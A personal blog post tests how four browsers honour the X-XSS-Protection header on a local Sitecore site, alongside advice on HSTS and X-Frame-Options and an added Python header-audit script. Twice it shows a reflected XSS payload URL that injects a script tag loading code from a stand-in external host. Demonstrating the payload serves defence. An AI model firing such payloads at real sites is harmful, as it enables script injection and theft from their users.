You can protect yourself with headers without any need for code. Some of the recommended headers are:

HTTP Strict Transport Security (HSTS)
HSTS informs browsers that the communication should only happen in HTTPS and not in HTTP.

X-Frame-Options
The X-Frame-Options header indicates if a browser should allow the render of a page in a frame, iframe or object. By implementing this header a site can avoid clickjacking attacks, by ensuring that the content is not embedded into other sites.

X-XSS-Protection
The X-XSS-Protection header tells the browser to enable its built-in reflective XSS filter, which is found in some modern browsers. Not all browsers support this header. Valid settings are:
0 – disable the protection
1 – enable the protection. If the browser detects an attack, the browser will sanitize the page
1; mode=block – enable the protection and block the response. If the browser detects an attack, the page will not be loaded and the browser won't sanitize the page
1; report=http://[YOURDOMAIN]/your_report_URI – enable the protection. If the browser detects an attack, the browser will sanitize the page and report the violation

By default we do not get many headers from the base install of Sitecore.

Let's do some testing.

X-Xss-Protection “0” – Disable

```xml
<system.webServer>
  <httpProtocol>
    <customHeaders>
      <add name="X-XSS-Protection" value="0" />
    </customHeaders>
  </httpProtocol>
</system.webServer>
```

Now we load http://local.testsc8.com/?special=%3Cscript%20src=%22https://somedomain.com/somescript.js%22%3E%3C/script%3E on a page that reads the special query string parameter and renders it on the page, causing the script to execute.

The header is sent as expected, but on closer inspection the four browsers each behave differently. Chrome and Firefox load the script, whereas Microsoft Edge and IE11 do not. We also see no console output.

X-Xss-Protection “1” – Enable & Sanitize

```xml
<system.webServer>
  <httpProtocol>
    <customHeaders>
      <add name="X-XSS-Protection" value="1" />
    </customHeaders>
  </httpProtocol>
</system.webServer>
```

Now we load http://local.testsc8.com/?special=%3Cscript%20src=%22https://somedomain.com/somescript.js%22%3E%3C/script%3E again. Something very interesting happens:

Chrome, Microsoft Edge and IE11 respect the header value of 1 and do not load the script.

Chrome, Microsoft Edge and IE11 show a console message.

Props to IE11 (never thought I would say this about IE), it even shows a very visible notification to the user.

Firefox, on the other hand, still loads the script and completely ignores the header.

Chrome does not load any content. No output in Network or Console tabs.

Firefox loads all the content including the offending script. No output in console.

Microsoft Edge and IE11 do not load any content. The console shows an error message and the network tab shows the request.

As you can see, each browser behaves differently. I would say in this case Firefox is the worst. We are unable to get full protection from all browsers with X-XSS-Protection alone. This should show us that there is no silver bullet. We would need to implement multiple protections to remedy the XSS vulnerability.
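As an added example (not code from the original post), a small Python audit that checks a response's headers for the three headers discussed above and parses the X-XSS-Protection settings listed earlier. It assumes the headers arrive as a dict (for instance from `requests.get(url).headers`); the sample headers are constructed.

```python
"""Audit a response's security headers against the three headers discussed above.
Assumption (not from the post): headers arrive as a dict, e.g. requests.get(url).headers;
SAMPLE_HEADERS below is constructed, not captured from a real site."""

def parse_xss_protection(value):
    """Parse an X-XSS-Protection value ("0", "1", "1; mode=block", "1; report=<uri>") into (enabled, mode, report_uri)."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    if not parts or parts[0] not in ("0", "1"):
        raise ValueError(f"unrecognised X-XSS-Protection value: {value!r}")
    enabled = parts[0] == "1"
    mode = report_uri = None
    for directive in parts[1:]:
        name, _, arg = directive.partition("=")  # split on the first '=' only, so report URIs may contain '='
        name = name.strip().lower()
        if name == "mode":
            mode = arg.strip()
        elif name == "report":
            report_uri = arg.strip()
    return enabled, mode, report_uri

def audit_headers(headers):
    """Return a list of findings; an empty list means every check passed."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    findings = []
    if "strict-transport-security" not in h:
        findings.append("missing Strict-Transport-Security (HSTS)")
    if "x-frame-options" not in h:
        findings.append("missing X-Frame-Options (clickjacking)")
    xss = h.get("x-xss-protection")
    if xss is None:
        findings.append("missing X-XSS-Protection")
    else:
        enabled, mode, _ = parse_xss_protection(xss)
        if not enabled:
            findings.append("X-XSS-Protection is 0 (filter disabled)")
        elif mode != "block":
            findings.append("X-XSS-Protection without mode=block (browser sanitizes instead of blocking)")
    return findings

# Constructed sample: only the value "1" header from the second test above is present.
SAMPLE_HEADERS = {"Content-Type": "text/html", "X-XSS-Protection": "1"}

if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_HEADERS):
        print("-", finding)
```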

One comment

For anyone adding X-Frame-Options, Sitecore 8.2 comes with a handler that adds this automatically. If you are building a form using the RequestForgeryToken, you'll notice that duplicate headers appear. Check out this article to see if it helps you hide the second: https://long2know.com/2016/03/asp-net-anti-forgery-configuration/

This is a personal blog. Any views or opinions represented in this blog are my own and do not represent those of people, institutions or organizations that I may or may not be associated with in a professional or personal capacity, including past, current and future employers, unless explicitly stated.